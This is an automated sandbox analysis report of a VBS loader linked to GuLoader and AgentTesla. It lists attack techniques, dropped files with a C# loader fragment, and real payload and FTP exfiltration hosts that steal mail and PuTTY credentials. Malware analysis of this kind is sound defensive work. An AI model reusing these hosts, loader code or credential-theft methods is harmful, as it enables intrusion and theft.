            Encrypted Channel            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain Accounts21
            Command and Scripting Interpreter            		Logon Script (Windows)12
            Process Injection            		321
            Scripting            		Security Account Manager321
            Security Software Discovery            		SMB/Windows Admin Shares1
            Email Collection            		Automated Exfiltration1
            Non-Standard Port            		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local Accounts1
            PowerShell            		Logon Script (Mac)Logon Script (Mac)2
            Obfuscated Files or Information            		NTDS1
            Process Discovery            		Distributed Component Object ModelInput CaptureScheduled Transfer2
            Non-Application Layer Protocol            		SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading            		LSA Secrets241
            Virtualization/Sandbox Evasion            		SSHKeyloggingData Transfer Size Limits23
            Application Layer Protocol            		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common1
            Masquerading            		Cached Domain Credentials1
            Application Window Discovery            		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items241
            Virtualization/Sandbox Evasion            		DCSync1
            System Network Configuration Discovery            		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
            Access Token Manipulation            		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)12
            Process Injection            		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 756154 Sample: SIEM_PO00938467648.vbs Startdate: 29/11/2022 Architecture: WINDOWS Score: 100 35 ftp.mcmprint.net 2->35 37 qwedft.gq 2->37 39 2 other IPs or domains 2->39 47 Snort IDS alert for network traffic 2->47 49 Multi AV Scanner detection for domain / URL 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 10 other signatures 2->53 9 wscript.exe 1 1 2->9         started        signatures3 process4 signatures5 63 Wscript starts Powershell (via cmd or directly) 9->63 65 Obfuscated command line found 9->65 67 Very long command line found 9->67 12 powershell.exe 25 9->12         started        16 cmd.exe 1 9->16         started        process6 file7 33 C:\Users\user\AppData\...\0j5ctfzr.cmdline, Unicode 12->33 dropped 69 Tries to detect Any.run 12->69 18 CasPol.exe 15 12 12->18         started        22 csc.exe 3 12->22         started        25 conhost.exe 12->25         started        27 conhost.exe 16->27         started        signatures8 process9 dnsIp10 41 ftp.mcmprint.net 185.31.121.136, 21, 49858, 49859 RAX-ASBG Bulgaria 18->41 43 qwedft.gq 162.240.62.179, 49855, 80 UNIFIEDLAYER-AS-1US United States 18->43 45 api.ipify.org.herokudns.com 52.20.78.240, 443, 49857 AMAZON-AESUS United States 18->45 55 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 18->55 57 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 18->57 59 Tries to steal Mail credentials (via file / registry access) 18->59 61 4 other signatures 18->61 31 C:\Users\user\AppData\Local\...\0j5ctfzr.dll, PE32 22->31 dropped 29 cvtres.exe 1 22->29         started        file11 signatures12 process13

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            SIEM_PO00938467648.vbs35%ReversingLabsScript-WScript.Trojan.GuLoader

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.dll100%Joe Sandbox ML

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            api.ipify.org.herokudns.com0%VirustotalBrowse
            ftp.mcmprint.net10%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://pesterbdd.com/images/Pester.png100%Avira URL Cloudmalware
            https://api.ipify.orgftp://ftp.mcmprint.netklogz0%Avira URL Cloudsafe
            http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
            http://qwedft.gq/Akkant/VUUby127.xsn0%Avira URL Cloudsafe
            http://kmbImL.com0%Avira URL Cloudsafe
            https://contoso.com/License0%Avira URL Cloudsafe
            https://contoso.com/0%Avira URL Cloudsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%Avira URL Cloudsafe
            http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%Avira URL Cloudsafe
            https://contoso.com/Icon0%Avira URL Cloudsafe
            https://ZK1g7ahAv5q7aIVR.comXy0%Avira URL Cloudsafe
            https://ZK1g7ahAv5q7aIVR.com0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            api.ipify.org.herokudns.com
            		52.20.78.240
            		truefalseunknown
            qwedft.gq
            		162.240.62.179
            		truefalse
              		unknown
              ftp.mcmprint.net
              		185.31.121.136
              		truetrueunknown
              api.ipify.org
              		unknown
              		unknownfalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://api.ipify.org/false
                  		high
                  http://qwedft.gq/Akkant/VUUby127.xsnfalse
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://kmbImL.comCasPol.exe, 0000000C.00000002.91117300370.000000001D8D1000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://127.0.0.1:HTTP/1.1CasPol.exe, 0000000C.00000002.91117300370.000000001D8D1000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		low
                  http://nuget.org/NuGet.exepowershell.exe, 00000006.00000002.86766294466.000000000534C000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://api.ipify.orgCasPol.exe, 0000000C.00000002.91117300370.000000001D8D1000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.86731242740.000000000443C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown
                      https://aka.ms/pscore6lBpowershell.exe, 00000006.00000002.86726548109.00000000042E1000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.86731242740.000000000443C000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://api.ipify.orgftp://ftp.mcmprint.netklogzCasPol.exe, 0000000C.00000002.91117300370.000000001D8D1000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          		unknown
                          https://contoso.com/powershell.exe, 00000006.00000002.86766294466.000000000534C000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.86766294466.000000000534C000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://contoso.com/Licensepowershell.exe, 00000006.00000002.86766294466.000000000534C000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwCasPol.exe, 0000000C.00000002.91117300370.000000001D8D1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://DynDns.comDynDNSnamejidpasswordPsi/PsiCasPol.exe, 0000000C.00000002.91117300370.000000001D8D1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://contoso.com/Iconpowershell.exe, 00000006.00000002.86766294466.000000000534C000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.86726548109.00000000042E1000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://ZK1g7ahAv5q7aIVR.comXyCasPol.exe, 0000000C.00000002.91118394619.000000001D920000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://ZK1g7ahAv5q7aIVR.comCasPol.exe, 0000000C.00000002.91118394619.000000001D920000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000003.86807185996.000000001C701000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.91121875644.000000001D9FD000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.86731242740.000000000443C000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                162.240.62.179
                                		qwedft.gqUnited States
                                		46606UNIFIEDLAYER-AS-1USfalse
                                52.20.78.240
                                		api.ipify.org.herokudns.comUnited States
                                		14618AMAZON-AESUSfalse
                                185.31.121.136
                                		ftp.mcmprint.netBulgaria
                                		199364RAX-ASBGtrue

                                General Information

                                Joe Sandbox Version:36.0.0 Rainbow Opal
                                Analysis ID:756154
                                Start date and time:2022-11-29 18:31:34 +01:00
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 15m 6s
                                Hypervisor based Inspection enabled:false
                                Report type:light
                                Sample file name:SIEM_PO00938467648.vbs
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                Run name:Suspected Instruction Hammering
                                Number of analysed new started processes analysed:15
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.troj.spyw.expl.evad.winVBS@13/10@3/3
                                EGA Information:
                                • Successful, ratio: 100%
                                HDC Information:Failed
                                HCA Information:
                                • Successful, ratio: 99%
                                • Number of executed functions: 0
                                • Number of non-executed functions: 0
                                Cookbook Comments:
                                • Found application associated with file extension: .vbs
                                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                Warnings

                                • Exclude process from analysis (whitelisted): dllhost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
                                • TCP Packets have been reduced to 100
                                • Excluded IPs from analysis (whitelisted): 20.190.159.0, 20.190.159.73, 40.126.31.71, 20.190.159.71, 20.190.159.68, 20.190.159.75, 20.190.159.2, 40.126.31.73
                                • Excluded domains from analysis (whitelisted): spclient.wg.spotify.com, wdcpalt.microsoft.com, client.wns.windows.com, prda.aadg.msidentity.com, login.live.com, ctldl.windowsupdate.com, wdcp.microsoft.com, login.msa.msidentity.com, www.tm.a.prd.aadg.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtReadVirtualMemory calls found.

                                Simulations

                                Behavior and APIs

                                No simulations

                                Joe Sandbox View / Context

                                IPs

                                No context

                                Domains

                                No context

                                ASNs

                                No context

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8003
                                Entropy (8bit):4.841989710132343
                                Encrypted:false
                                SSDEEP:192:Qxoe5GVsm5emddVFn3eGOVpN6K3bkkjo5dgkjDt4iWN3yBGHD9smqdcU6C5pOWik:7hVoGIpN6KQkj22kjh4iUxgrib4J
                                MD5:677C4E3A07935751EA3B092A5E23232F
                                SHA1:0BB391E66C6AE586907E9A8F1EE6CA114ACE02CD
                                SHA-256:D05D82E08469946C832D1493FA05D9E44926911DB96A89B76C2A32AC1CBC931F
                                SHA-512:253BCC6033980157395016038E22D3A49B0FA40AEE18CC852065423BEF773BF000EAAEB0809D0B9C4E167883288B05BA168AF0A756D6B74852778EAAA30055C2
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.0.cs

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (1049), with no line terminators
                                Category:dropped
                                Size (bytes):1052
                                Entropy (8bit):4.997907941877808
                                Encrypted:false
                                SSDEEP:24:JVSgTlR8ZhIZFbamwTJI1ro8kkcw+n1csrsIuY:JVlTlR8DIZFbLwTJI1rb/P+n1BrsIX
                                MD5:5CB0DD0B77A3DA8C76FA25C6482E90D5
                                SHA1:309AAF2851C84D34E8C8FC38B102721126D3E145
                                SHA-256:4A5B247BE5F2AD1BF7CB3E184F7F687B5D59C7DE795FD1EAF69B7B0E2F4F716E
                                SHA-512:F4842683F2B44C5FE29A03CAC23BCE6358F2FFF9A4CD1232319591CB3A48834C95DC07DA3159584DE2AED4F0EBE9A7A517ED4676D38DC63B35BA405D5FA7BD19
                                Malicious:false
                                Preview:.using System;using System.Runtime.InteropServices;public static class Tueiron1 {[DllImport("user32")]public static extern int DestroyCaret();[DllImport("gdi32")]public static extern int ScaleWindowExtEx(int Drift,int Ambula,int Baso,int iagtta,int Vejmat158,int Mcgr);[DllImport("kernel32")]public static extern int HeapSize(int Prop,int Adres,int Tortri);[DllImport("shell32.dll")]public static extern void DragFinish(int Omdr);[DllImport("winmm.dll")]public static extern int mixerGetDevCaps(int Nitr,int Fel,int Afs93);[DllImport("kernel32")]public static extern int LockResource(int Lei);[DllImport("kernel32")]public static extern int VirtualAlloc(int v1,int v2,int v3,int v4);[DllImport("ADVAPI32.DLL")]public static extern void MapGenericMask(int Brink,int Midts);[DllImport("kernel32")]public static extern IntPtr EnumSystemLocalesW(uint v1,int v2);[DllImport("kernel32")]public static extern int SetThreadAffinityMask(int Rebuil,int Semis);[DllImport("user32")]public static extern int Se

                                C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.cmdline

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
                                Category:dropped
                                Size (bytes):371
                                Entropy (8bit):5.263514527807254
                                Encrypted:false
                                SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2CN23fAzxs7+AEszICN23fyAn:p37Lvkmb6KmYWZE7V
                                MD5:5782379115A5C7704ACCE3E9383AF816
                                SHA1:60D28D5DDD965175CB39C6BB0DF5AC1A224BCEC0
                                SHA-256:7604F449D890B1488ACFB0DDACABA6E1E24A51097835E4B47A35B507657EBD7B
                                SHA-512:A5AC3636A13572513032E3AF1253FE244AD76950FD508A04C101E0C92C2A946B4E012E28D6805DA3AE41CDF131A6B03CA89A0ECD188AD2E47756CAAAD9D9FDA4
                                Malicious:true
                                Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.0.cs"

                                C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.dll

                                Download File
                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):4096
                                Entropy (8bit):3.0750833499217003
                                Encrypted:false
                                SSDEEP:48:6VJk5TZxiz1MDgQzufTbFukMAx7551ul6a3eq:OIWz1MDgVfTSACsK
                                MD5:CA1B80C27B39A8FF11303A0A90CB8ACC
                                SHA1:3558A01472147CD4D7509DDEFA51F9E4F437172B
                                SHA-256:FFE5482B92E9206F567B6F96DB1FDE3117BE892D717769DF78197A52198486F6
                                SHA-512:1DE5FE8955B5DD27C311423AC59E184B8823353AAC34BF90A0F66EC0BEDFB39D82C210F589505D1A806FDF152DD69D0FDB5BE8EEAB36EA19A5A628C40B08ED73
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....P.c...........!................^&... ...@....... ....................................@..................................&..W....@.......................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................@&......H.......P ..............................................................BSJB............v4.0.30319......l...t...#~......@...#Strings.... .......#US.(.......#GUID...8...|...#Blob...........G.........%3............................................................0.).....f.....f.......................................... 7............ D............ U............ ^............ i............ y.$.......... ..).......... ..1.......... ..7.......... ..=.......... ..)...................

                                C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.out

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                Category:modified
                                Size (bytes):866
                                Entropy (8bit):5.33012640290001
                                Encrypted:false
                                SSDEEP:12:xKqR37Lvkmb6KmYWZE7wKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:Aqd3ka6KmpE7wKax5DqBVKVrdFAMBJTH
                                MD5:419D835EDD086DBCD1FB8CAFE131A363
                                SHA1:F02C01889D4EB029501F2842FED63BEE75A32AAC
                                SHA-256:C95EF9EFF8E1F8076E9C103BD88E939445D3E45956155401AF076E08F81C1D24
                                SHA-512:D56124B2E20DF3848BBB3B15C3C30B3F6D7019312D5D6E07ADDA6A6741C66BEF5B96DB38727021864D1AF1EE243024BDFD8735BAA98EBDF3292A4CEA7195BFC7
                                Malicious:false
                                Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                C:\Users\user\AppData\Local\Temp\0j5ctfzr\CSC3A80B568F8BB4D66897E5CE811419E16.TMP

                                Download File
                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                File Type:MSVC .res
                                Category:dropped
                                Size (bytes):652
                                Entropy (8bit):3.101934875256757
                                Encrypted:false
                                SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryLAak7Ynqq2lPN5Dlq5J:+RI+ycuZhNpAakS2lPNnqX
                                MD5:1A68EE12BE04A630C8BF56D4F7473ED0
                                SHA1:ED9048C3B8B4013A63E612FF08CD59512E49A3FD
                                SHA-256:B37612CBD66EF7BDD73717ADB5C978216B44420DED73796AD570D0FE6DD8D24D
                                SHA-512:F03CD19608B470B8AF2154A212BC6A5E75AFB7C0C0975AE0E2A28A33BE0E721F60B0491FFDBC23568F9B5A2D9C2DC7E9E4A7850D9908C6AD437942AEAD83AFF5
                                Malicious:false
                                Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...0.j.5.c.t.f.z.r...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...0.j.5.c.t.f.z.r...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                C:\Users\user\AppData\Local\Temp\RES7743.tmp

                                Download File
                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Tue Nov 29 18:34:00 2022, 1st section name ".debug$S"
                                Category:dropped
                                Size (bytes):1332
                                Entropy (8bit):4.001985755678852
                                Encrypted:false
                                SSDEEP:24:H9zW9Y89G/8qH9QwKPfwI+ycuZhNpAakS2lPNnqS2d:xiG/8qFKPo1ul6a3eqSG
                                MD5:F4BF383029179F79AE0437C25B9B88AC
                                SHA1:51A35E88821784CBC14768F2F96D9A4AFD88DDB0
                                SHA-256:CD999401D357C7AB4F043A403294A91E994DA74376E032E0CD0A5F9DD8618A91
                                SHA-512:8973B94881E0E57C1D2868DFE1965988072C9796077DDE07E685F59F534CA60CC3F72C60859F40177EDC879EB0C55016CD43BA779A972C639E75FFD19FCDA68A
                                Malicious:false
                                Preview:L....P.c.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........U....c:\Users\user\AppData\Local\Temp\0j5ctfzr\CSC3A80B568F8BB4D66897E5CE811419E16.TMP...................h.....0.V..G>...........5.......C:\Users\user\AppData\Local\Temp\RES7743.tmp.-.<....................a..Microsoft (R) CVTRES.Y.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...0.j.5.c.t.f.z.r...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ch5v15x.nhz.ps1

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_casrbuj4.tcb.psm1

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                \Device\ConDrv

                                Download File
                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):30
                                Entropy (8bit):3.964735178725505
                                Encrypted:false
                                SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                                MD5:9F754B47B351EF0FC32527B541420595
                                SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                                SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                                SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                                Malicious:false
                                Preview:NordVPN directory not found!..

                                Static File Info

                                General

                                File type:ASCII text, with CRLF line terminators
                                Entropy (8bit):5.836608054626225
                                TrID:
                                  File name:SIEM_PO00938467648.vbs
                                  File size:350795
                                  MD5:633811bccf3fe62978ce41a04b653083
                                  SHA1:bc81307b5c229094617e7cb8cdcaec55eaddad36
                                  SHA256:b5e4225737f935940fa23989440d5ea2c123c8affde25d6d7224e2b4abab5608
                                  SHA512:ade8c018c14b2c9de5df6c9c82130c309fd85084137d6e919c42b6fe7abb5ffde356f2d951f33ec3355df88f7134d51f66121afa3c7ca9f7bac047e0b73d0fa7
                                  SSDEEP:6144:J8YNxYPOwuvNR5vwfZKU2fU/5Mhc1gXcSGN+DieVwzjb6HZIKK:uijvPFWNEClgsSgpeVf6KK
                                  TLSH:AB74AE5DDA28DACD4F4E2F4ADC821A47C4654623D02614F9EEB5CB8E11C2ECDCE293D8
                                  File Content Preview:..'zephyrian stratagem Wigwamerne177 Alcoholisable53 PROMISINGLY ..'ACETAMID GRANULARITY Mandatet torteaus TANGFORLSENDES ALTOCUMULUS Jambarts ..'Gein187 garglers Goslet Afblsnings ENEHERREDMMERS UNDSEELIGHED TUSSENS Mrtelvrkets139 HOG besvrger stellularl

                                  File Icon

                                  Icon Hash:e8d69ece869a9ec4

                                  Network Behavior

                                  Snort IDS Alerts

                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                  192.168.11.20185.31.121.13649858212029927 11/29/22-18:34:46.981738TCP2029927ET TROJAN AgentTesla Exfil via FTP4985821192.168.11.20185.31.121.136
                                  192.168.11.20185.31.121.13649859597722851779 11/29/22-18:34:47.016884TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil4985959772192.168.11.20185.31.121.136

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Nov 29, 2022 18:34:32.485622883 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:32.643971920 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.644260883 CET4985580192.168.11.20162.240.62.179
